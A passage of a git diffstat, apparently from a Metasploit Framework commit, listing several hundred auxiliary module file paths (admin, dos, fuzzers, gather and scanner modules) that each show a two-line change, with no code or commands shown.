modules/auxiliary/admin/http/axigen_file_access.rb | 2 +- .../admin/http/cfme_manageiq_evm_pass_reset.rb | 2 +- .../admin/http/contentkeeper_fileaccess.rb | 2 +- .../admin/http/dlink_dir_300_600_exec_noauth.rb | 2 +- .../admin/http/dlink_dir_645_password_extractor.rb | 2 +- .../admin/http/dlink_dsl320b_password_extractor.rb | 2 +- .../http/foreman_openstack_satellite_priv_esc.rb | 2 +- .../auxiliary/admin/http/hp_web_jetadmin_exec.rb | 2 +- modules/auxiliary/admin/http/iis_auth_bypass.rb | 2 +- .../auxiliary/admin/http/intersil_pass_reset.rb | 2 +- .../admin/http/iomega_storcenterpro_sessionid.rb | 2 +- modules/auxiliary/admin/http/jboss_bshdeployer.rb | 2 +- .../admin/http/jboss_deploymentfilerepository.rb | 2 +- modules/auxiliary/admin/http/jboss_seam_exec.rb | 2 +- .../auxiliary/admin/http/kaseya_master_admin.rb | 2 +- .../admin/http/katello_satellite_priv_esc.rb | 2 +- .../admin/http/limesurvey_file_download.rb | 2 +- .../admin/http/linksys_e1500_e2500_exec.rb | 2 +- .../http/linksys_tmunblock_admin_reset_bof.rb | 2 +- .../auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- .../admin/http/manage_engine_dc_create_admin.rb | 2 +- .../admin/http/manageengine_dir_listing.rb | 2 +- .../admin/http/manageengine_file_download.rb | 2 +- .../admin/http/manageengine_pmp_privesc.rb | 2 +- .../admin/http/mutiny_frontend_read_delete.rb | 2 +- .../auxiliary/admin/http/netflow_file_download.rb | 2 +- .../auxiliary/admin/http/netgear_auth_download.rb | 2 +- .../admin/http/netgear_soap_password_extractor.rb | 2 +- .../auxiliary/admin/http/nexpose_xxe_file_read.rb | 2 +- .../admin/http/novell_file_reporter_filedelete.rb | 2 +- modules/auxiliary/admin/http/openbravo_xxe.rb | 2 +- .../admin/http/rails_devise_pass_reset.rb | 2 +- .../auxiliary/admin/http/scrutinizer_add_user.rb | 2 +- .../auxiliary/admin/http/sophos_wpa_traversal.rb | 2 +- modules/auxiliary/admin/http/sysaid_admin_acct.rb | 2 +- .../auxiliary/admin/http/sysaid_file_download.rb | 2 +- modules/auxiliary/admin/http/sysaid_sql_creds.rb | 2 +- .../auxiliary/admin/http/tomcat_administration.rb | 2 +- .../auxiliary/admin/http/tomcat_utf8_traversal.rb | 2 +- .../admin/http/trendmicro_dlp_traversal.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2009_001.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2009_002.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2010_020.rb | 2 +- .../http/typo3_winstaller_default_enc_keys.rb | 2 +- .../admin/http/vbulletin_upgrade_admin.rb | 2 +- .../admin/http/wp_custom_contact_forms.rb | 2 +- .../admin/http/wp_easycart_privilege_escalation.rb | 2 +- .../admin/http/wp_wplms_privilege_escalation.rb | 2 +- .../admin/http/zyxel_admin_password_extractor.rb | 2 +- .../admin/kerberos/ms14_068_kerberos_checksum.rb | 2 +- modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb | 2 +- .../auxiliary/admin/misc/sercomm_dump_config.rb | 2 +- modules/auxiliary/admin/misc/wol.rb | 2 +- modules/auxiliary/admin/motorola/wr850g_cred.rb | 2 +- modules/auxiliary/admin/ms/ms08_059_his2006.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum.rb | 2 +- .../admin/mssql/mssql_enum_domain_accounts.rb | 2 +- .../admin/mssql/mssql_enum_domain_accounts_sqli.rb | 2 +- .../auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 2 +- .../admin/mssql/mssql_escalate_dbowner.rb | 2 +- .../admin/mssql/mssql_escalate_dbowner_sqli.rb | 2 +- .../admin/mssql/mssql_escalate_execute_as.rb | 2 +- .../admin/mssql/mssql_escalate_execute_as_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_exec.rb | 2 +- .../admin/mssql/mssql_findandsampledata.rb | 2 +- modules/auxiliary/admin/mssql/mssql_idf.rb | 2 +- .../auxiliary/admin/mssql/mssql_ntlm_stealer.rb | 2 +- .../admin/mssql/mssql_ntlm_stealer_sqli.rb | 2 +- modules/auxiliary/admin/mssql/mssql_sql.rb | 2 +- modules/auxiliary/admin/mssql/mssql_sql_file.rb | 2 +- modules/auxiliary/admin/mysql/mysql_enum.rb | 2 +- modules/auxiliary/admin/mysql/mysql_sql.rb | 2 +- modules/auxiliary/admin/natpmp/natpmp_map.rb | 2 +- .../admin/officescan/tmlisten_traversal.rb | 2 +- modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb | 2 +- modules/auxiliary/admin/oracle/oracle_login.rb | 2 +- modules/auxiliary/admin/oracle/oracle_sql.rb | 2 +- modules/auxiliary/admin/oracle/oraenum.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr2.rb | 2 +- modules/auxiliary/admin/oracle/osb_execqr3.rb | 2 +- .../admin/oracle/post_exploitation/win32exec.rb | 2 +- .../admin/oracle/post_exploitation/win32upload.rb | 2 +- modules/auxiliary/admin/oracle/sid_brute.rb | 2 +- modules/auxiliary/admin/oracle/tnscmd.rb | 2 +- modules/auxiliary/admin/pop2/uw_fileretrieval.rb | 2 +- .../auxiliary/admin/postgres/postgres_readfile.rb | 2 +- modules/auxiliary/admin/postgres/postgres_sql.rb | 2 +- .../admin/sap/sap_configservlet_exec_noauth.rb | 2 +- modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb | 2 +- .../scada/advantech_webaccess_dbvisitor_sqli.rb | 2 +- .../admin/scada/ge_proficy_substitute_traversal.rb | 2 +- modules/auxiliary/admin/scada/modicon_command.rb | 2 +- .../admin/scada/modicon_password_recovery.rb | 2 +- .../auxiliary/admin/scada/modicon_stux_transfer.rb | 2 +- modules/auxiliary/admin/scada/multi_cip_command.rb | 2 +- .../admin/scada/yokogawa_bkbcopyd_client.rb | 2 +- modules/auxiliary/admin/serverprotect/file.rb | 2 +- modules/auxiliary/admin/smb/check_dir_file.rb | 2 +- modules/auxiliary/admin/smb/delete_file.rb | 2 +- modules/auxiliary/admin/smb/download_file.rb | 2 +- modules/auxiliary/admin/smb/list_directory.rb | 2 +- modules/auxiliary/admin/smb/psexec_command.rb | 2 +- modules/auxiliary/admin/smb/psexec_ntdsgrab.rb | 2 +- .../auxiliary/admin/smb/samba_symlink_traversal.rb | 2 +- modules/auxiliary/admin/smb/upload_file.rb | 2 +- .../admin/sunrpc/solaris_kcms_readfile.rb | 2 +- modules/auxiliary/admin/tftp/tftp_transfer_util.rb | 2 +- modules/auxiliary/admin/tikiwiki/tikidblib.rb | 2 +- modules/auxiliary/admin/upnp/soap_portmapping.rb | 2 +- modules/auxiliary/admin/vmware/poweroff_vm.rb | 2 +- modules/auxiliary/admin/vmware/poweron_vm.rb | 2 +- modules/auxiliary/admin/vmware/tag_vm.rb | 2 +- .../admin/vmware/terminate_esx_sessions.rb | 2 +- modules/auxiliary/admin/vnc/realvnc_41_bypass.rb | 2 +- .../vxworks/apple_airport_extreme_password.rb | 2 +- .../admin/vxworks/dlink_i2eye_autoanswer.rb | 2 +- .../auxiliary/admin/vxworks/wdbrpc_memory_dump.rb | 2 +- modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb | 2 +- .../auxiliary/admin/webmin/edit_html_fileaccess.rb | 2 +- modules/auxiliary/admin/webmin/file_disclosure.rb | 2 +- modules/auxiliary/admin/zend/java_bridge.rb | 2 +- modules/auxiliary/analyze/jtr_aix.rb | 2 +- modules/auxiliary/analyze/jtr_crack_fast.rb | 2 +- modules/auxiliary/analyze/jtr_linux.rb | 2 +- modules/auxiliary/analyze/jtr_mssql_fast.rb | 2 +- modules/auxiliary/analyze/jtr_mysql_fast.rb | 2 +- modules/auxiliary/analyze/jtr_oracle_fast.rb | 2 +- modules/auxiliary/analyze/jtr_postgres_fast.rb | 2 +- modules/auxiliary/bnat/bnat_router.rb | 2 +- modules/auxiliary/bnat/bnat_scan.rb | 2 +- modules/auxiliary/client/smtp/emailer.rb | 2 +- modules/auxiliary/crawler/msfcrawler.rb | 2 +- modules/auxiliary/docx/word_unc_injector.rb | 2 +- .../auxiliary/dos/cisco/ios_http_percentpercent.rb | 2 +- modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb | 2 +- modules/auxiliary/dos/dns/bind_tkey.rb | 2 +- modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb | 2 +- modules/auxiliary/dos/hp/data_protector_rds.rb | 2 +- .../auxiliary/dos/http/3com_superstack_switch.rb | 2 +- ...droid_stock_browser_iframe_dos_cve_2012_6301.rb | 2 +- .../dos/http/apache_commons_fileupload_dos.rb | 2 +- modules/auxiliary/dos/http/apache_mod_isapi.rb | 2 +- modules/auxiliary/dos/http/apache_range_dos.rb | 2 +- .../dos/http/apache_tomcat_transfer_encoding.rb | 2 +- .../auxiliary/dos/http/canon_wireless_printer.rb | 2 +- modules/auxiliary/dos/http/dell_openmanage_post.rb | 2 +- .../dos/http/f5_bigip_apm_max_sessions.rb | 2 +- modules/auxiliary/dos/http/gzip_bomb_dos.rb | 2 +- modules/auxiliary/dos/http/hashcollision_dos.rb | 2 +- modules/auxiliary/dos/http/monkey_headers.rb | 2 +- .../auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 +- modules/auxiliary/dos/http/nodejs_pipelining.rb | 2 +- .../dos/http/novell_file_reporter_heap_bof.rb | 2 +- modules/auxiliary/dos/http/rails_action_view.rb | 2 +- modules/auxiliary/dos/http/rails_json_float_dos.rb | 2 +- modules/auxiliary/dos/http/sonicwall_ssl_format.rb | 2 +- modules/auxiliary/dos/http/webrick_regex.rb | 2 +- .../dos/http/wordpress_long_password_dos.rb | 2 +- modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb | 2 +- modules/auxiliary/dos/mdns/avahi_portzero.rb | 2 +- modules/auxiliary/dos/misc/dopewars.rb | 2 +- .../dos/misc/ibm_sametime_webplayer_dos.rb | 2 +- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 2 +- modules/auxiliary/dos/misc/memcached.rb | 2 +- modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb | 2 +- modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb | 2 +- modules/auxiliary/dos/samba/lsa_addprivs_heap.rb | 2 +- modules/auxiliary/dos/samba/lsa_transnames_heap.rb | 2 +- .../auxiliary/dos/samba/read_nttrans_ea_list.rb | 2 +- .../dos/sap/sap_soap_rfc_eps_delete_file.rb | 2 +- modules/auxiliary/dos/scada/beckhoff_twincat.rb | 2 +- modules/auxiliary/dos/scada/d20_tftp_overflow.rb | 2 +- modules/auxiliary/dos/scada/igss9_dataserver.rb | 2 +- modules/auxiliary/dos/scada/yokogawa_logsvr.rb | 2 +- modules/auxiliary/dos/smtp/sendmail_prescan.rb | 2 +- .../auxiliary/dos/solaris/lpd/cascade_delete.rb | 2 +- modules/auxiliary/dos/ssl/dtls_changecipherspec.rb | 2 +- .../auxiliary/dos/ssl/dtls_fragment_overflow.rb | 2 +- modules/auxiliary/dos/ssl/openssl_aesni.rb | 2 +- modules/auxiliary/dos/syslog/rsyslog_long_tag.rb | 2 +- modules/auxiliary/dos/tcp/junos_tcp_opt.rb | 2 +- modules/auxiliary/dos/tcp/synflood.rb | 2 +- modules/auxiliary/dos/upnp/miniupnpd_dos.rb | 2 +- modules/auxiliary/dos/windows/appian/appian_bpm.rb | 2 +- .../dos/windows/browser/ms09_065_eot_integer.rb | 2 +- .../dos/windows/ftp/filezilla_admin_user.rb | 2 +- .../dos/windows/ftp/filezilla_server_port.rb | 2 +- .../auxiliary/dos/windows/ftp/guildftp_cwdlist.rb | 2 +- .../dos/windows/ftp/iis75_ftpd_iac_bof.rb | 2 +- .../dos/windows/ftp/iis_list_exhaustion.rb | 2 +- modules/auxiliary/dos/windows/ftp/solarftp_user.rb | 2 +- modules/auxiliary/dos/windows/ftp/titan626_site.rb | 2 +- .../auxiliary/dos/windows/ftp/vicftps50_list.rb | 2 +- .../auxiliary/dos/windows/ftp/winftp230_nlst.rb | 2 +- .../auxiliary/dos/windows/ftp/xmeasy560_nlst.rb | 2 +- .../auxiliary/dos/windows/ftp/xmeasy570_nlst.rb | 2 +- modules/auxiliary/dos/windows/games/kaillera.rb | 2 +- .../dos/windows/http/ms10_065_ii6_asp_dos.rb | 2 +- modules/auxiliary/dos/windows/http/pi3web_isapi.rb | 2 +- .../auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb | 2 +- modules/auxiliary/dos/windows/nat/nat_helper.rb | 2 +- .../dos/windows/rdp/ms12_020_maxchannelids.rb | 2 +- modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb | 2 +- .../auxiliary/dos/windows/smb/ms06_035_mailslot.rb | 2 +- .../auxiliary/dos/windows/smb/ms06_063_trans.rb | 2 +- .../auxiliary/dos/windows/smb/ms09_001_write.rb | 2 +- .../windows/smb/ms09_050_smb2_negotiate_pidhigh.rb | 2 +- .../windows/smb/ms09_050_smb2_session_logoff.rb | 2 +- .../smb/ms10_006_negotiate_response_loop.rb | 2 +- .../windows/smb/ms10_054_queryfs_pool_overflow.rb | 2 +- .../dos/windows/smb/ms11_019_electbowser.rb | 2 +- .../dos/windows/smb/rras_vls_null_deref.rb | 2 +- .../dos/windows/smb/vista_negotiate_stop.rb | 2 +- .../dos/windows/smtp/ms06_019_exchange.rb | 2 +- .../dos/windows/ssh/sysax_sshd_kexchange.rb | 2 +- modules/auxiliary/dos/windows/tftp/pt360_write.rb | 2 +- modules/auxiliary/dos/windows/tftp/solarwinds.rb | 2 +- modules/auxiliary/dos/wireshark/capwap.rb | 2 +- modules/auxiliary/dos/wireshark/chunked.rb | 2 +- modules/auxiliary/dos/wireshark/cldap.rb | 2 +- modules/auxiliary/dos/wireshark/ldap.rb | 2 +- modules/auxiliary/fuzzers/dns/dns_fuzzer.rb | 2 +- modules/auxiliary/fuzzers/ftp/client_ftp.rb | 2 +- modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb | 2 +- modules/auxiliary/fuzzers/http/http_form_field.rb | 2 +- .../auxiliary/fuzzers/http/http_get_uri_long.rb | 2 +- .../auxiliary/fuzzers/http/http_get_uri_strings.rb | 2 +- .../auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb | 2 +- .../fuzzers/smb/smb2_negotiate_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_create_pipe.rb | 2 +- .../fuzzers/smb/smb_create_pipe_corrupt.rb | 2 +- .../auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb | 2 +- .../fuzzers/smb/smb_ntlm1_login_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smb/smb_tree_connect.rb | 2 +- .../fuzzers/smb/smb_tree_connect_corrupt.rb | 2 +- modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb | 2 +- .../auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb | 2 +- modules/auxiliary/fuzzers/ssh/ssh_version_15.rb | 2 +- modules/auxiliary/fuzzers/ssh/ssh_version_2.rb | 2 +- .../auxiliary/fuzzers/ssh/ssh_version_corrupt.rb | 2 +- modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb | 2 +- .../auxiliary/fuzzers/tds/tds_login_username.rb | 2 +- .../auxiliary/gather/alienvault_iso27001_sqli.rb | 2 +- .../gather/alienvault_newpolicyform_sqli.rb | 2 +- .../auxiliary/gather/android_browser_file_theft.rb | 2 +- .../gather/android_browser_new_tab_cookie_theft.rb | 2 +- .../auxiliary/gather/android_htmlfileprovider.rb | 2 +- .../gather/android_object_tag_webview_uxss.rb | 2 +- .../auxiliary/gather/android_stock_browser_uxss.rb | 2 +- .../gather/apache_karaf_command_execution.rb | 2 +- modules/auxiliary/gather/apache_rave_creds.rb | 2 +- .../gather/apple_safari_ftp_url_cookie_theft.rb | 2 +- .../gather/apple_safari_webarchive_uxss.rb | 2 +- modules/auxiliary/gather/avtech744_dvr_accounts.rb | 2 +- modules/auxiliary/gather/checkpoint_hostname.rb | 2 +- modules/auxiliary/gather/chromecast_wifi.rb | 2 +- .../gather/citrix_published_applications.rb | 2 +- .../gather/citrix_published_bruteforce.rb | 2 +- modules/auxiliary/gather/coldfusion_pwd_props.rb | 2 +- modules/auxiliary/gather/corpwatch_lookup_id.rb | 2 +- modules/auxiliary/gather/corpwatch_lookup_name.rb | 2 +- modules/auxiliary/gather/d20pass.rb | 2 +- modules/auxiliary/gather/dns_bruteforce.rb | 2 +- modules/auxiliary/gather/dns_cache_scraper.rb | 2 +- modules/auxiliary/gather/dns_info.rb | 2 +- modules/auxiliary/gather/dns_reverse_lookup.rb | 2 +- modules/auxiliary/gather/dns_srv_enum.rb | 2 +- .../auxiliary/gather/doliwamp_traversal_creds.rb | 2 +- modules/auxiliary/gather/drupal_openid_xxe.rb | 2 +- modules/auxiliary/gather/eaton_nsm_creds.rb | 2 +- modules/auxiliary/gather/emc_cta_xxe.rb | 2 +- modules/auxiliary/gather/enum_dns.rb | 2 +- .../auxiliary/gather/eventlog_cred_disclosure.rb | 2 +- modules/auxiliary/gather/external_ip.rb | 2 +- .../auxiliary/gather/f5_bigip_cookie_disclosure.rb | 2 +- .../auxiliary/gather/firefox_pdfjs_file_theft.rb | 2 +- .../gather/flash_rosetta_jsonp_url_disclosure.rb | 2 +- modules/auxiliary/gather/hp_enum_perfd.rb | 2 +- modules/auxiliary/gather/hp_snac_domain_creds.rb | 2 +- modules/auxiliary/gather/huawei_wifi_info.rb | 2 +- .../gather/ibm_sametime_enumerate_users.rb | 2 +- .../auxiliary/gather/ibm_sametime_room_brute.rb | 2 +- modules/auxiliary/gather/ibm_sametime_version.rb | 2 +- modules/auxiliary/gather/ie_uxss_injection.rb | 2 +- modules/auxiliary/gather/impersonate_ssl.rb | 2 +- modules/auxiliary/gather/java_rmi_registry.rb | 2 +- modules/auxiliary/gather/jenkins_cred_recovery.rb | 2 +- .../gather/joomla_com_realestatemanager_sqli.rb | 2 +- .../auxiliary/gather/joomla_contenthistory_sqli.rb | 2 +- modules/auxiliary/gather/joomla_weblinks_sqli.rb | 2 +- .../auxiliary/gather/konica_minolta_pwd_extract.rb | 2 +- modules/auxiliary/gather/lansweeper_collector.rb | 2 +- modules/auxiliary/gather/mantisbt_admin_sqli.rb | 2 +- modules/auxiliary/gather/mcafee_epo_xxe.rb | 2 +- modules/auxiliary/gather/memcached_extractor.rb | 2 +- .../gather/mongodb_js_inject_collection_enum.rb | 2 +- modules/auxiliary/gather/ms14_052_xmldom.rb | 2 +- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- .../auxiliary/gather/natpmp_external_address.rb | 2 +- modules/auxiliary/gather/opennms_xxe.rb | 2 +- .../auxiliary/gather/safari_file_url_navigation.rb | 2 +- modules/auxiliary/gather/search_email_collector.rb | 2 +- modules/auxiliary/gather/shodan_search.rb | 2 +- modules/auxiliary/gather/solarwinds_orion_sqli.rb | 2 +- modules/auxiliary/gather/ssllabs_scan.rb | 2 +- .../auxiliary/gather/trackit_sql_domain_creds.rb | 2 +- modules/auxiliary/gather/vbulletin_vote_sqli.rb | 2 +- .../gather/windows_deployment_services_shares.rb | 2 +- .../gather/wp_all_in_one_migration_export.rb | 2 +- .../wp_ultimate_csv_importer_user_extract.rb | 2 +- .../gather/wp_w3_total_cache_hash_extract.rb | 2 +- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- modules/auxiliary/gather/xerox_pwd_extract.rb | 2 +- .../auxiliary/gather/xerox_workcentre_5xxx_ldap.rb | 2 +- modules/auxiliary/parser/unattend.rb | 2 +- modules/auxiliary/pdf/foxit/authbypass.rb | 2 +- modules/auxiliary/scanner/acpp/login.rb | 2 +- modules/auxiliary/scanner/afp/afp_login.rb | 2 +- modules/auxiliary/scanner/afp/afp_server_info.rb | 2 +- .../scanner/backdoor/energizer_duo_detect.rb | 2 +- modules/auxiliary/scanner/chargen/chargen_probe.rb | 2 +- modules/auxiliary/scanner/couchdb/couchdb_enum.rb | 2 +- modules/auxiliary/scanner/couchdb/couchdb_login.rb | 2 +- modules/auxiliary/scanner/db2/db2_auth.rb | 2 +- modules/auxiliary/scanner/db2/db2_version.rb | 2 +- modules/auxiliary/scanner/db2/discovery.rb | 2 +- .../auxiliary/scanner/dcerpc/endpoint_mapper.rb | 2 +- modules/auxiliary/scanner/dcerpc/hidden.rb | 2 +- modules/auxiliary/scanner/dcerpc/management.rb | 2 +- .../auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb | 2 +- .../scanner/dcerpc/windows_deployment_services.rb | 2 +- modules/auxiliary/scanner/dect/call_scanner.rb | 2 +- modules/auxiliary/scanner/dect/station_scanner.rb | 2 +- modules/auxiliary/scanner/discovery/arp_sweep.rb | 2 +- modules/auxiliary/scanner/discovery/empty_udp.rb | 2 +- .../scanner/discovery/ipv6_multicast_ping.rb | 2 +- .../auxiliary/scanner/discovery/ipv6_neighbor.rb | 2 +- .../ipv6_neighbor_router_advertisement.rb | 2 +- modules/auxiliary/scanner/discovery/udp_probe.rb | 2 +- modules/auxiliary/scanner/discovery/udp_sweep.rb | 2 +- .../auxiliary/scanner/dlsw/dlsw_leak_capture.rb | 2 +- modules/auxiliary/scanner/dns/dns_amp.rb | 2 +- .../scanner/elasticsearch/indices_enum.rb | 2 +- .../scanner/emc/alphastor_devicemanager.rb | 2 +- .../scanner/emc/alphastor_librarymanager.rb | 2 +- modules/auxiliary/scanner/finger/finger_users.rb | 2 +- modules/auxiliary/scanner/ftp/anonymous.rb | 2 +- .../auxiliary/scanner/ftp/bison_ftp_traversal.rb | 2 +- modules/auxiliary/scanner/ftp/ftp_login.rb | 2 +- modules/auxiliary/scanner/ftp/ftp_version.rb | 2 +- .../auxiliary/scanner/ftp/konica_ftp_traversal.rb | 2 +- .../auxiliary/scanner/ftp/pcman_ftp_traversal.rb | 2 +- .../scanner/ftp/titanftp_xcrc_traversal.rb | 2 +- modules/auxiliary/scanner/h323/h323_version.rb | 2 +- .../http/a10networks_ax_directory_traversal.rb | 2 +- .../http/accellion_fta_statecode_file_read.rb | 2 +- modules/auxiliary/scanner/http/adobe_xml_inject.rb | 2 +- .../http/allegro_rompager_misfortune_cookie.rb | 2 +- .../http/apache_activemq_source_disclosure.rb | 2 +- .../scanner/http/apache_activemq_traversal.rb | 2 +- .../scanner/http/apache_mod_cgi_bash_env.rb | 2 +- .../auxiliary/scanner/http/apache_userdir_enum.rb | 2 +- modules/auxiliary/scanner/http/appletv_login.rb | 2 +- .../scanner/http/atlassian_crowd_fileaccess.rb | 2 +- .../scanner/http/axis_local_file_include.rb | 2 +- modules/auxiliary/scanner/http/axis_login.rb | 2 +- modules/auxiliary/scanner/http/backup_file.rb | 2 +- .../scanner/http/barracuda_directory_traversal.rb | 2 +- .../http/bitweaver_overlay_type_traversal.rb | 2 +- modules/auxiliary/scanner/http/blind_sql_query.rb | 2 +- .../scanner/http/bmc_trackit_passwd_reset.rb | 2 +- modules/auxiliary/scanner/http/brute_dirs.rb | 2 +- modules/auxiliary/scanner/http/buffalo_login.rb | 2 +- .../scanner/http/caidao_bruteforce_login.rb | 2 +- modules/auxiliary/scanner/http/canon_wireless.rb | 2 +- modules/auxiliary/scanner/http/cert.rb | 2 +- modules/auxiliary/scanner/http/chef_webui_login.rb | 2 +- .../auxiliary/scanner/http/chromecast_webserver.rb | 2 +- modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 2 +- .../auxiliary/scanner/http/cisco_device_manager.rb | 2 +- .../scanner/http/cisco_ios_auth_bypass.rb | 2 +- .../auxiliary/scanner/http/cisco_ironport_enum.rb | 2 +- .../scanner/http/cisco_nac_manager_traversal.rb | 2 +- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 2 +- .../scanner/http/cisco_ssl_vpn_priv_esc.rb | 2 +- .../auxiliary/scanner/http/clansphere_traversal.rb | 2 +- .../scanner/http/coldfusion_locale_traversal.rb | 2 +- .../auxiliary/scanner/http/coldfusion_version.rb | 2 +- .../scanner/http/concrete5_member_list.rb | 2 +- modules/auxiliary/scanner/http/copy_of_file.rb | 2 +- modules/auxiliary/scanner/http/crawler.rb | 2 +- modules/auxiliary/scanner/http/dell_idrac.rb | 2 +- modules/auxiliary/scanner/http/dir_listing.rb | 2 +- modules/auxiliary/scanner/http/dir_scanner.rb | 2 +- .../scanner/http/dir_webdav_unicode_bypass.rb | 2 +- .../scanner/http/dlink_dir_300_615_http_login.rb | 2 +- .../scanner/http/dlink_dir_615h_http_login.rb | 2 +- .../http/dlink_dir_session_cgi_http_login.rb | 2 +- .../scanner/http/dlink_user_agent_backdoor.rb | 2 +- modules/auxiliary/scanner/http/dolibarr_login.rb | 2 +- .../scanner/http/drupal_views_user_enum.rb | 2 +- modules/auxiliary/scanner/http/ektron_cms400net.rb | 2 +- .../scanner/http/elasticsearch_traversal.rb | 2 +- modules/auxiliary/scanner/http/enum_wayback.rb | 2 +- .../auxiliary/scanner/http/error_sql_injection.rb | 2 +- .../auxiliary/scanner/http/etherpad_duo_login.rb | 2 +- .../scanner/http/f5_bigip_virtual_server.rb | 2 +- modules/auxiliary/scanner/http/f5_mgmt_scanner.rb | 2 +- .../auxiliary/scanner/http/file_same_name_dir.rb | 2 +- modules/auxiliary/scanner/http/files_dir.rb | 2 +- modules/auxiliary/scanner/http/frontpage_login.rb | 2 +- modules/auxiliary/scanner/http/git_scanner.rb | 2 +- modules/auxiliary/scanner/http/gitlab_login.rb | 2 +- modules/auxiliary/scanner/http/gitlab_user_enum.rb | 2 +- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- .../auxiliary/scanner/http/goahead_traversal.rb | 2 +- .../http/groupwise_agents_http_traversal.rb | 2 +- .../scanner/http/host_header_injection.rb | 2 +- .../http/hp_imc_bims_downloadservlet_traversal.rb | 2 +- .../http/hp_imc_faultdownloadservlet_traversal.rb | 2 +- .../http/hp_imc_ictdownloadservlet_traversal.rb | 2 +- .../http/hp_imc_reportimgservlt_traversal.rb | 2 +- .../scanner/http/hp_imc_som_file_download.rb | 2 +- .../hp_sitescope_getfileinternal_fileaccess.rb | 2 +- .../http/hp_sitescope_getsitescopeconfiguration.rb | 2 +- .../hp_sitescope_loadfilecontent_fileaccess.rb | 2 +- .../auxiliary/scanner/http/hp_sys_mgmt_login.rb | 2 +- modules/auxiliary/scanner/http/http_header.rb | 2 +- modules/auxiliary/scanner/http/http_hsts.rb | 2 +- modules/auxiliary/scanner/http/http_login.rb | 2 +- modules/auxiliary/scanner/http/http_put.rb | 2 +- modules/auxiliary/scanner/http/http_traversal.rb | 2 +- modules/auxiliary/scanner/http/http_version.rb | 2 +- modules/auxiliary/scanner/http/httpbl_lookup.rb | 2 +- modules/auxiliary/scanner/http/iis_internal_ip.rb | 2 +- modules/auxiliary/scanner/http/influxdb_enum.rb | 2 +- modules/auxiliary/scanner/http/infovista_enum.rb | 2 +- modules/auxiliary/scanner/http/ipboard_login.rb | 2 +- modules/auxiliary/scanner/http/jboss_status.rb | 2 +- modules/auxiliary/scanner/http/jboss_vulnscan.rb | 2 +- modules/auxiliary/scanner/http/jenkins_command.rb | 2 +- modules/auxiliary/scanner/http/jenkins_enum.rb | 2 +- modules/auxiliary/scanner/http/jenkins_login.rb | 2 +- .../scanner/http/joomla_bruteforce_login.rb | 2 +- .../http/joomla_ecommercewd_sqli_scanner.rb | 2 +- .../scanner/http/joomla_gallerywd_sqli_scanner.rb | 2 +- modules/auxiliary/scanner/http/joomla_pages.rb | 2 +- modules/auxiliary/scanner/http/joomla_plugins.rb | 2 +- modules/auxiliary/scanner/http/joomla_version.rb | 2 +- .../scanner/http/linknat_vos_traversal.rb | 2 +- .../scanner/http/linksys_e1500_traversal.rb | 2 +- .../scanner/http/litespeed_source_disclosure.rb | 2 +- modules/auxiliary/scanner/http/lucky_punch.rb | 2 +- .../scanner/http/majordomo2_directory_traversal.rb | 2 +- .../http/manageengine_desktop_central_login.rb | 2 +- .../http/manageengine_deviceexpert_traversal.rb | 2 +- .../http/manageengine_deviceexpert_user_creds.rb | 2 +- .../http/manageengine_securitymanager_traversal.rb | 2 +- .../scanner/http/mediawiki_svg_fileaccess.rb | 2 +- .../scanner/http/mod_negotiation_brute.rb | 2 +- .../scanner/http/mod_negotiation_scanner.rb | 2 +- .../scanner/http/ms09_020_webdav_unicode_bypass.rb | 2 +- .../scanner/http/ms15_034_http_sys_memory_dump.rb | 2 +- .../auxiliary/scanner/http/mybook_live_login.rb | 2 +- .../scanner/http/netdecision_traversal.rb | 2 +- .../scanner/http/netgear_sph200d_traversal.rb | 2 +- .../scanner/http/nginx_source_disclosure.rb | 2 +- .../http/novell_file_reporter_fsfui_fileaccess.rb | 2 +- .../http/novell_file_reporter_srs_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/novell_mdm_creds.rb | 2 +- .../scanner/http/ntlm_info_enumeration.rb | 2 +- modules/auxiliary/scanner/http/open_proxy.rb | 2 +- .../scanner/http/openmind_messageos_login.rb | 2 +- modules/auxiliary/scanner/http/options.rb | 2 +- .../oracle_demantra_database_credentials_leak.rb | 2 +- .../scanner/http/oracle_demantra_file_retrieval.rb | 2 +- .../auxiliary/scanner/http/oracle_ilom_login.rb | 2 +- .../auxiliary/scanner/http/owa_iis_internal_ip.rb | 2 +- modules/auxiliary/scanner/http/owa_login.rb | 2 +- modules/auxiliary/scanner/http/pocketpad_login.rb | 2 +- .../scanner/http/prev_dir_same_name_file.rb | 2 +- .../scanner/http/radware_appdirector_enum.rb | 2 +- .../scanner/http/rails_json_yaml_scanner.rb | 2 +- .../scanner/http/rails_mass_assignment.rb | 2 +- 